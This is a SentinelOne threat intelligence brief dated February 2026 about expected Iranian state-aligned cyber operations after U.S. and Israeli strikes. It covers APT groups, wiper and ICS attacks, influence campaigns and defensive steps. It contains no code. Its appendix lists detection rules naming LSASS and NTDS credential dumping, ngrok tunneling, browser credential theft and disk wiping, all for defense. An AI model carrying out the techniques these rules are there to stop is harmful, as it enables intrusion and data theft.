To Our Partners and Customers
The following intelligence brief was sent to all SentinelOne partners and customers today:
Executive Summary
Recent U.S. and Israeli strikes against Iranian targets, followed by Iranian attacks on multiple regional locations, present a highly dynamic geopolitical situation with credible cyber threat implications. Iran has historically incorporated cyber operations into periods of regional escalation.
Given the rapid escalation of geopolitical tensions, we assess that Iranian state-aligned cyber activity is likely to intensify in the near-term based on a long track record of leveraging cyber operations for asymmetric retaliation, coercive signaling, and strategic messaging. Prior campaigns, including destructive wiper malware, infrastructure disruption, and influence operations masquerading as ‘hacktivism’, demonstrate both capability and intent to operate in the cyber domain alongside kinetic action.
This report outlines Iran’s historical cyber posture, relevant tactics and tradecraft, and our forward-looking assessment of potential cyber responses in the days and weeks following the airstrikes.
We assess with high confidence that organizations in Israel, the United States, and allied nations are likely to face direct or indirect targeting – particularly within government, critical infrastructure, defense, financial services, academic, and media sectors.
We recommend that all clients, especially those operating in, or supporting, U.S. and Israeli infrastructure, review their security posture and preparedness accordingly.
This assessment is current as of February 28, 2026 and reflects a rapidly evolving threat environment.
Iran’s Cyber Operations to Date
Iran presents a mature, well-resourced cyberthreat based on more than fifteen years of experience across a wide range of malicious cyber events.
Iran uses a diverse set of cyber tools to further state objectives, particularly preservation of the Iranian regime, including:
- Espionage and credential theft via APT34, APT39, APT42, and MuddyWater, targeting a wide range of military, civilian, telecommunications, and academic institutions, particularly against regional targets (Israel, Middle East) and the United States
- Disruptive and destructive campaigns, notably wiper malware such as Shamoon and MeteorExpress
- Targeted spearphishing and social engineering campaigns, supporting strategic intelligence collection across multiple industries
- Fake hacktivist personas for plausible deniability and psychological impact (e.g., DarkBit, Cyber Av3ngers)
- Coordinated disinformation and influence ops across Telegram, X, and compromised news outlets
- Internet blackouts within Iran to control public opinion and narrative, while similarly countering the effect of foreign influence operations
- Proxy ransomware and criminal fronts blurring lines between state and financially motivated actors
Iranian cyber actors previously aligned their operations with kinetic campaigns, often acting as a force multiplier for regional allies like Hamas or as a standalone tool of retaliation. The TTPs employed by Iranian hacktivists increasingly mirror those used by state-sponsored APTs, raising critical questions about capability sharing and formal command-and-control relationships within this environment.
Expected Iranian Cyber Response to Current Events
1 – Precision Espionage Operations
Expect escalated targeting of Israeli defense, government, and intelligence networks using spearphishing, credential harvesting, and deployment of custom malware. Historically, groups such as APT34 (OilRig) and APT42 (TA453) leveraged legitimate access to move laterally and exfiltrate strategic intelligence. Additionally, U.S. military and government organizations will likely be targeted in similar campaigns.
Anticipated Targets:
- U.S. military and government organizations
- Israeli defense entities and affiliated research organizations
- U.S. and Israeli diplomatic infrastructure
- Defense contractors and supply chain partners
- Strategic allies and locations in theater
2 – Disruptive & Destructive Tactics
Iran has a well-documented history of using destructive malware and DDoS attacks to disrupt the critical infrastructure of its adversaries. We assess a high likelihood of similar tactics being deployed against U.S. and Israeli sectors, particularly utilities and public-facing systems.
Key techniques include:
- Deployment of wipers via fake hacktivist personas or directly-attributed APT clusters
- Exploitation of unpatched or poorly secured public-facing web services for defacement and initial access
- Use of scheduled tasks and LOLBins to execute custom wiper malware with stealth and persistence
Anticipated Targets:
- Transportation, Communication, Energy and Water utilities in U.S. and Israel
- Telecom, alerting systems, and national broadcast infrastructure
- Financial platforms and digital banking services
3 – Coordinated Influence & Disinformation Campaigns
Iranian-aligned actors are likely to amplify disinformation campaigns to shape public perception, particularly around civilian impact, military failure, and geopolitical instability. These efforts often run concurrently with real-world escalations and aim to degrade public trust in institutions.
Anticipated Themes:
- Allegations of Israeli war crimes
- U.S. and Israeli military losses
- Fabricated claims of successful Iranian cyber retaliation
- Disinformation on U.S.–Israel political division
- Leaks of manipulated or stolen documents misattributed to Israeli insiders
- Lack of support from the U.S. populace for ongoing strikes against Iran
4 – Probing Attacks on U.S. & Israeli Infrastructure
Iran has demonstrated readiness to expand attacks to Western infrastructure during periods of high tension. Recent examples include the exploitation of Unitronics PLCs at U.S. water treatment plants (late 2023), highlighting a shift toward ICS/OT targets. Such actions serve retaliatory and signaling purposes and are often designed to be low-impact yet high-visibility to maximize psychological effect.
Anticipated Targets:
- U.S. defense industrial base, especially contractors supporting military action
- Israeli military and key government organizations
- Critical infrastructure (water, energy, transportation) in the U.S. and Israel
- Regional partners (e.g., Jordan, UAE, Egypt, Saudi Arabia) aligned with U.S. and Israeli interests
- Media and academic institutions reporting on the conflict
SentinelOne Detection & Monitoring Posture
SentinelOne research and detection teams have closely followed Iranian cyber actors for many years. We provide multiple layers of protection and are closely monitoring emerging threat intelligence to maximize coverage.
We extensively cover techniques known to be used by Iranian threat groups including:
- PowerShell and script abuse
- Proxy tools
- Credential theft
- Keylogger components
- Wipers
- Browser credential theft
- DLL sideloading
- Tunneling tools (ngrok/Cloudflared)
- Scheduled task persistence
- Remote access tool abuse
- Active Directory reconnaissance
- Destructive boot tampering
These protections are not Iran-specific but known to be effective in detecting their operations.
We are monitoring the situation closely and can ship new detections quickly through Platform Rules updates or Live Security Updates.
For maximum protection, we recommend:
- Turning on Live Updates
- Ensuring you’re opted-in to Emerging Threat Platform Rules
- Activating Platform Detection Library rules listed in Appendix A
Recommendations
- Increase Vigilance Against Phishing and Credential Abuse
- Prioritize MFA enforcement and internal phishing detection
- Monitor for abuse of VPN, email, and collaboration platforms
- Monitor for suspicious activity involving legitimate user accounts and applications
- Harden Critical Infrastructure and OT Environments
- Patch and segment exposed ICS components, especially common HMI/PLC vendors
- Scan all Internet-facing infrastructure, and patch any vulnerable Internet-facing services
- Consider removing or restricting network access to any non-critical Internet-facing services, especially if they are not protected by MFA
- Review DDoS mitigation playbooks and response procedures
- Monitor for Influence Operations and Fake Leaks
- Establish rapid communication response protocols for disinformation relevant to your organization
- Be prepared for threat actors using “hacktivist” branding and Telegram/Telegram-style platforms for communication
- Consider there are likely masquerade efforts and this requires a detailed assessment to determine true origin
- Review and Test Incident Response Plans
- Ensure IR and SOC teams maintain heightened alert status
- Simulate data-wipe and ransomware scenarios
- Simulate corporate social media hijacking scenarios and prepare for account pausing/access resets
- Establish Clear Points of Contact
- Ensure internal organization has direct POCs for support for security incidents
- Communicate posture expectations and escalation paths internally
- Monitor for activity associated with Iranian state-aligned threat actors
SentinelOne is proactively hunting for IOCs and TTPs associated with these groups. These threat hunts are being performed for all Wayfinder Threat Hunting customers. Any related hunt findings will be visible in the Wayfinder Threat Hunting dashboard.
Closing Note
This report is intended to support informed decision-making and proactive defensive measures amid a dynamic and escalating geopolitical conflict.
The cyber threat landscape associated with Iranian state-aligned actors is adaptive, and we assess that both targeting priorities and tactics may shift rapidly in response to real world developments, political statements, or perceived provocations.
We advise clients to treat this as a time-sensitive assessment and to revisit posture, incident response, and monitoring processes regularly.
For immediate questions or escalations, please contact your Client Success Lead or reach our Support teams directly at: https://www.sentinelone.com/global-services/get-support-now/
Appendix
Customers should consider activating Platform Detection Library rules to improve coverage. The following rules are known to be effective against Iranian cyber operations:
MuddyWater
- Possible MuddyWater DLL Drop Consistent with Audio Driver Sideloading
Credential Dumping
- Suspicious Task Creation for Credential Harvesting
- Python-Based Network Exploitation Tool
- Potential LSASS Dumping Tools
- Credential Dumping via Shadow Copy
- Interactive NTDS Harvesting via VSS
- Cached Domain Credential Dumping
Tunneling & Remote Access
- Ngrok Domain Contacted
- Cloudflared Persistent Tunnel Establishment Detected
- Anomalous Process Initiating Cloudflare Tunnel Traffic
Collection & Exfiltration
- Keylogging Script via PowerShell
- Chromium Browser Info Stealer via Remote Debugging
- Browser Credential and Cookie Data Access Attempt
PowerShell/Script Abuse
- PowerShell Script Execution via Time Based Integer IPv4
- Suspicious Usage of .NET Reflection via PowerShell
- Encoded Powershell Launching Command Line Download
Defense Evasion, Impact, Discovery
- Potential DLL Sideloading in PerfLogs Directory
- Disk Data Wipe Attempt via Dd Utility
- Boot Configuration Tampering via BCDEdit
- BloodHound Active Directory Reconnaissance File Creation
